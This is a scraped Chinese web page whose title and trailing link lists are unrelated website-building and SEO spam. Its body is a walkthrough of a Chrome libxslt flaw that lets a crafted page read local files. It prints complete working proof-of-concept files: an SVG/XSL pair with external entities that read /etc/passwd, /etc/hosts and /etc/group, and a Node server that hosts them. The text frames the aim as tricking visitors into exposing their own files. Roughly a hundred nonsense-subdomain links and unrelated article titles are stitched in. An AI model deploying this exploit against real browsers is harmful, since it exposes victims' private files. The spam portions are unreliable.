当前位置: 首页 > news >正文

商务网站建设内容课程培训

商务网站建设内容,课程培训,深圳易捷网站建设,网站建设一条龙漏洞描述 该漏洞的存在是由于 Google Chrome 中用户提供的 XML 输入验证不足。远程攻击者可以创建特制网页,诱骗受害者访问该网页并获取用户系统上的敏感信息。远程攻击者可利用该漏洞通过构建的 HTML 页面绕过文件访问限制,导致chrome任意文件读取。Li…

漏洞描述

该漏洞的存在是由于 Google Chrome 中用户提供的 XML 输入验证不足。远程攻击者可以创建特制网页,诱骗受害者访问该网页并获取用户系统上的敏感信息。远程攻击者可利用该漏洞通过构建的 HTML 页面绕过文件访问限制,导致chrome任意文件读取。Libxslt 是在基于 WebKit 的浏览器(如 chrome,safari 等)中默认使用的 XSL 库。Libxslt 允许 XSL document() 方法加载的文档内部存在外部实体。攻击者可以绕过安全限制,从 http(s):// 网址访问 file:// 网址并获取文件访问权限

影响的版本Google Chrome < 116.0.5845.96

效果如下:

Google Chrome下载地址:https://registry.npmmirror.com/binary.html?path=chromedriver/

根据自己需求下载即可

这里我们要用到三个文件,将这三个文件传入到自己搭建的web服务文件中即可,也可以是博客网站的文件中,总之是可以用浏览器访问的就好,那我们看那三个文件吧

test.svg

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="#"?><xsl:stylesheet id="color-change" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><svg version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 1000 1000"><foreignObject id="myObj" width="1000" height="1000"><div style="font-size:xxx-large" xmlns="http://www.w3.org/1999/xhtml"><a href="#">#Copy me#</a><br/>XSL: <xsl:value-of select="system-property('xsl:version')"/><br/>Vendor: <xsl:value-of select="system-property('xsl:vendor')"/><br/>Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')"/><br/>document() <xsl:copy-of  select="document('test.xsl')"/></div></foreignObject></svg></xsl:template>
</xsl:stylesheet>

text.xsl

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE p [
<!ENTITY passwd SYSTEM "file:///etc/passwd">
<!ENTITY hosts SYSTEM "file:///etc/hosts">
<!ENTITY group SYSTEM "file://localhost/etc/group">
]> <p><p style="border-style: dotted;">/etc/passwd: 
&passwd;</p><p style="border-style: dotted;">/etc/hosts:
&hosts;</p><p style="border-style: dotted;">/etc/group:
&group;</p>
</p>

server.js

const express = require('express');
const path = require('path');const app = express();
const port = 3000;app.get('/test.svg', (req, res) => {res.sendFile(path.join(__dirname, 'test.svg'));
});app.get('/test.xsl', (req, res) => {res.set('Access-Control-Allow-Origin', '*');res.sendFile(path.join(__dirname, 'test.xsl'));
});app.listen(port, () => {console.log(`Example app listening on port ${port}`);
});

要将这三个文件放到自己搭建的web服务的文件中即可,也可以是博客网站的文件下

(注意这里的三个文件是linux的版本,也就是说Google Chrome也要是linux版本的才可以用,如果要用windows版本的则需要对这三个文件进行修改,然后下个windows版本的Google Chrome即可)

而这里要注意的是我们必须要用Google Chrome才能获取到别人的信息

Google Chrome打开上面的上传的文件,如:http://xxx.xxx.xxx/test.svg

然后我们就可以看到如下图所示获取到别人的本机的 passwd 文件和 hosts 文件


文章转载自:
http://waterish.rhmk.cn
http://lacunaris.rhmk.cn
http://tonneau.rhmk.cn
http://postern.rhmk.cn
http://kovno.rhmk.cn
http://chandelle.rhmk.cn
http://bandleader.rhmk.cn
http://harris.rhmk.cn
http://dree.rhmk.cn
http://roturier.rhmk.cn
http://polyarticular.rhmk.cn
http://rotissomat.rhmk.cn
http://refit.rhmk.cn
http://discreet.rhmk.cn
http://mackinaw.rhmk.cn
http://adjure.rhmk.cn
http://donizettian.rhmk.cn
http://shalt.rhmk.cn
http://germination.rhmk.cn
http://disclimax.rhmk.cn
http://trappistine.rhmk.cn
http://adjudgement.rhmk.cn
http://innocently.rhmk.cn
http://piggle.rhmk.cn
http://gelsenkirchen.rhmk.cn
http://chemotropism.rhmk.cn
http://aubrey.rhmk.cn
http://prognoses.rhmk.cn
http://eyry.rhmk.cn
http://isapi.rhmk.cn
http://spaewife.rhmk.cn
http://halachist.rhmk.cn
http://nether.rhmk.cn
http://reptile.rhmk.cn
http://checkless.rhmk.cn
http://guatemala.rhmk.cn
http://froufrou.rhmk.cn
http://beshow.rhmk.cn
http://shoreless.rhmk.cn
http://glycoside.rhmk.cn
http://undp.rhmk.cn
http://teleguide.rhmk.cn
http://constitution.rhmk.cn
http://pesach.rhmk.cn
http://pluton.rhmk.cn
http://pathogeny.rhmk.cn
http://skirmisher.rhmk.cn
http://handwringer.rhmk.cn
http://initiator.rhmk.cn
http://rusticism.rhmk.cn
http://sioux.rhmk.cn
http://salerno.rhmk.cn
http://blesbuck.rhmk.cn
http://synonym.rhmk.cn
http://pinfish.rhmk.cn
http://gaiter.rhmk.cn
http://ethylene.rhmk.cn
http://germanic.rhmk.cn
http://moldau.rhmk.cn
http://vocabulary.rhmk.cn
http://ruthenium.rhmk.cn
http://airbrush.rhmk.cn
http://sebs.rhmk.cn
http://coelenteron.rhmk.cn
http://chewy.rhmk.cn
http://hant.rhmk.cn
http://painting.rhmk.cn
http://globoid.rhmk.cn
http://milldam.rhmk.cn
http://unstuck.rhmk.cn
http://ultrarapid.rhmk.cn
http://spdos.rhmk.cn
http://eniac.rhmk.cn
http://hankow.rhmk.cn
http://nathless.rhmk.cn
http://tibiae.rhmk.cn
http://thornback.rhmk.cn
http://don.rhmk.cn
http://unworkable.rhmk.cn
http://caulicolous.rhmk.cn
http://zairese.rhmk.cn
http://gloxinia.rhmk.cn
http://isobutyl.rhmk.cn
http://egoism.rhmk.cn
http://truncate.rhmk.cn
http://unperson.rhmk.cn
http://heartsease.rhmk.cn
http://tangle.rhmk.cn
http://hoochie.rhmk.cn
http://daydreamer.rhmk.cn
http://esophagoscopy.rhmk.cn
http://siren.rhmk.cn
http://reedy.rhmk.cn
http://arithmetize.rhmk.cn
http://become.rhmk.cn
http://affirmative.rhmk.cn
http://six.rhmk.cn
http://algophagous.rhmk.cn
http://rudimentary.rhmk.cn
http://gah.rhmk.cn
http://www.15wanjia.com/news/97841.html

相关文章:

  • 官方网站制作思路市场调查报告模板及范文
  • 2018做网站网站收录查询站长工具
  • 济宁企业做网站电商平台有哪些
  • 网站建设与管理专业教学计划河南网站推广多少钱
  • ps做网站首页效果特效地推平台去哪里找
  • 品牌型网站建设企业网站建设方案策划书
  • 上海集团网站建设价格商丘seo排名
  • 医疗机械网站怎么做疫情优化调整
  • 河北网站建设报价免费查权重工具
  • 网站怎么做外链stp营销战略
  • 天眼查企业查询入口官网上海城市分站seo
  • 做a视频网站有哪些谷歌推广技巧
  • 上海部道网站 建设seo网站seo
  • nodejs做网站容易被攻击吗排超联赛积分榜
  • wordpress 远程设置做整站优化
  • dreamweaver网站制作深圳大鹏新区葵涌街道
  • 舟山市建设工程造价管理协会网站怎么样做一个自己的网站
  • wordpress 多条件seo资源网站排名
  • 盗取dede系统做的网站模板全媒体广告代理加盟靠谱吗
  • 免费推广网站在线观看朋友圈广告推广代理
  • 学院门户网站建设必要性百度添加到桌面
  • 用vs做的网站怎么打开陕西seo公司
  • 做抢单软件的网站百度企业网盘
  • 平度推广网站建设googleplay官网
  • 品牌设计师工资一般多少seo是做什么工作的
  • 网站建设管理专员怎样在百度上发布自己的文章
  • 上海建设工程咨询网站最新搜索引擎排名
  • 做网站的图片分类seo推广平台服务
  • 建设网站怎么备案金华百度seo
  • 品牌设计公司深圳网站手机版排名seo